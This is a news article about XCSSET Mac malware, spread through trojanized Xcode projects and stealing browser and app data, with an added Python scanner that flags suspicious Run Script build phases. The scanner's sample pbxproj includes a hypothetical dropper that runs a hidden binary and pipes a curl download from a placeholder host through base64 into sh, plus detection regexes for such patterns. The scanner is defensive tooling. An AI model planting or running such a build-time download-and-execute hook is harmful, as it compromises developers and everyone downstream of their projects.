Trojanized Xcode projects are being used to spread Mac malware that can compromise Safari and other browsers.
The XCSSET malware family has been found embedded in Xcode projects, and unpacking it leads down a rabbit hole of malicious payloads.
According to security researchers at Trend Micro, the unusual infection of a developer's project also led to the discovery of two zero-day vulnerabilities being exploited in the wild.
Xcode is Apple's free integrated development environment (IDE) for macOS, used to develop software and apps for Apple platforms.
Although it is not yet clear how XCSSET finds its way into Xcode projects, once embedded, the malware runs whenever the project is built.
The affected systems are presumed to belong primarily to developers. The Xcode projects have been modified so that building them executes malicious code, which eventually drops and runs the main XCSSET malware on the affected system.
Several affected developers have shared their projects on GitHub, which could result in "supply chain-like attacks for users who rely on these repositories as dependencies in their own projects."
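The article does not say which part of the project XCSSET hooks to get code execution at build time. One documented place where an Xcode project can run arbitrary shell code during a build is a Run Script build phase, stored in `project.pbxproj` as a `PBXShellScriptBuildPhase` object. The following scanner is an added example written for this page, not Trend Micro's or the malware's code: it extracts every Run Script phase from a pbxproj file and flags scripts with traits a reviewer of a third-party Xcode dependency would want to look at (hidden paths, download-and-pipe-to-shell, base64 decoding, backgrounded execution). The embedded pbxproj fragment is constructed for the example; the second phase is modeled on the build-time execution the article describes and is not XCSSET's actual script. Whether XCSSET used this exact phase type is an assumption.

```python
"""Scan an Xcode project.pbxproj for Run Script build phases that could run
arbitrary code when the project is built (added example, not project code)."""
import re
from typing import Dict, List

# Constructed sample: a trimmed project.pbxproj fragment with two Run Script
# phases. The first is a benign linter call; the second is a hypothetical
# build-time dropper (hidden path, download piped to sh). Not real XCSSET code.
SAMPLE_PBXPROJ = r"""
/* Begin PBXShellScriptBuildPhase section */
		1A2B3C4D /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "swiftlint --quiet\n";
		};
		DEADBEEF /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "chmod +x \"$SRCROOT/.hidden/updater\" && \"$SRCROOT/.hidden/updater\" &\ncurl -s http://example.invalid/p | base64 -d | sh\n";
		};
/* End PBXShellScriptBuildPhase section */
"""

# One pbxproj object: <hex id> /* comment */ = { ... };  (no nested dicts in
# build-phase objects, so the first "};" after the "{" closes the object)
PHASE_RE = re.compile(
    r'(?P<id>[0-9A-Fa-f]{8,32})\s*(?:/\*[^*]*\*/)?\s*=\s*\{(?P<body>.*?)\};',
    re.S,
)
# Quoted pbxproj string with C-style escapes (\" \\ \n)
SCRIPT_RE = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"\s*;', re.S)
SHELL_RE = re.compile(r'shellPath\s*=\s*"?([^";]+)"?\s*;')

# Heuristic indicators; each is (name, regex applied to the unescaped script)
INDICATORS = [
    ("download", re.compile(r'\b(curl|wget)\b')),
    ("decode", re.compile(r'\bbase64\s+(-d|-D|--decode)\b')),
    ("pipe_to_shell", re.compile(r'\|\s*(sh|bash|zsh|python\d?|osascript)\b')),
    ("hidden_path", re.compile(r'/\.[A-Za-z0-9_-]+/')),
    ("background_exec", re.compile(r'&\s*$', re.M)),
    ("eval", re.compile(r'\beval\b')),
]


def _unescape(s: str) -> str:
    """Undo the C-style escaping pbxproj uses inside quoted strings."""
    out, i = [], 0
    while i < len(s):
        c = s[i]
        if c == '\\' and i + 1 < len(s):
            nxt = s[i + 1]
            out.append({'n': '\n', 't': '\t', '"': '"', '\\': '\\'}.get(nxt, nxt))
            i += 2
        else:
            out.append(c)
            i += 1
    return ''.join(out)


def scan_pbxproj(text: str) -> List[Dict]:
    """Return one record per PBXShellScriptBuildPhase: id, shell, script, indicators."""
    results = []
    for m in PHASE_RE.finditer(text):
        body = m.group('body')
        if 'isa = PBXShellScriptBuildPhase;' not in body:
            continue
        sm = SCRIPT_RE.search(body)
        script = _unescape(sm.group(1)) if sm else ''
        pm = SHELL_RE.search(body)
        results.append({
            'id': m.group('id'),
            'shell': pm.group(1).strip() if pm else '/bin/sh',
            'script': script,
            'indicators': [name for name, rx in INDICATORS if rx.search(script)],
        })
    return results


if __name__ == '__main__':
    for phase in scan_pbxproj(SAMPLE_PBXPROJ):
        verdict = 'SUSPICIOUS' if phase['indicators'] else 'ok'
        print(f"{phase['id']} [{verdict}] {phase['shell']}: "
              f"{', '.join(phase['indicators']) or '-'}")
        for line in phase['script'].splitlines():
            print('    ' + line)
```

Run it against a real project with `scan_pbxproj(open('App.xcodeproj/project.pbxproj').read())`. The indicators are heuristics, not a signature: a legitimate phase that downloads a tool will also trip `download`, so the point is to surface every script that runs at build time for human review before a cloned repository is built or pulled in as a dependency. A clean scan does not prove a project is safe, since a malicious phase can also call a binary already checked into the repository.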
Once on a vulnerable system, XCSSET targets browsers, including the development version of Safari, and exploits vulnerabilities in them to steal user data.
In the case of Safari, the first bug is a flaw in Data Vault. A bypass was found that circumvents the protection macOS places on Safari's cookie files by going through SSHD.
The second vulnerability lies in how Safari WebKit (the development version of Safari) operates. Normally, launching it requires the user to enter their password, but a bypass was found that lets the malware perform malicious operations through the unsandboxed Safari browser. Dylib hijacking also appears to be possible.
Trend Micro believes the UXSS (universal cross-site scripting) element of the attack chain could be used not only to steal general user information, but also to modify browser sessions to display malicious websites, change cryptocurrency wallet addresses, harvest credit card information from the Apple Store, and steal credentials for services including Apple ID, Google, PayPal, and Yandex.
The malware can also steal a variety of other user data, including Evernote content, Notes app data, and conversations from Skype, Telegram, QQ, and WeChat.
In addition, XCSSET can take screenshots, exfiltrate stolen files to a command-and-control (C2) server, and includes a ransomware module that encrypts files and displays a ransom demand.
So far, only two Xcode projects harboring the malware have been found, along with 380 victim IP addresses, the majority of which are located in China and India.
Affected developers will unwittingly distribute the Trojan to their users in the form of the compromised Xcode projects. Because the developers themselves are unaware that they are shipping malicious files, integrity checks on the distributed files (such as comparing hashes) do not help: the hashes a developer publishes are those of the already compromised build, so they will match.
Image credit: MacSecurity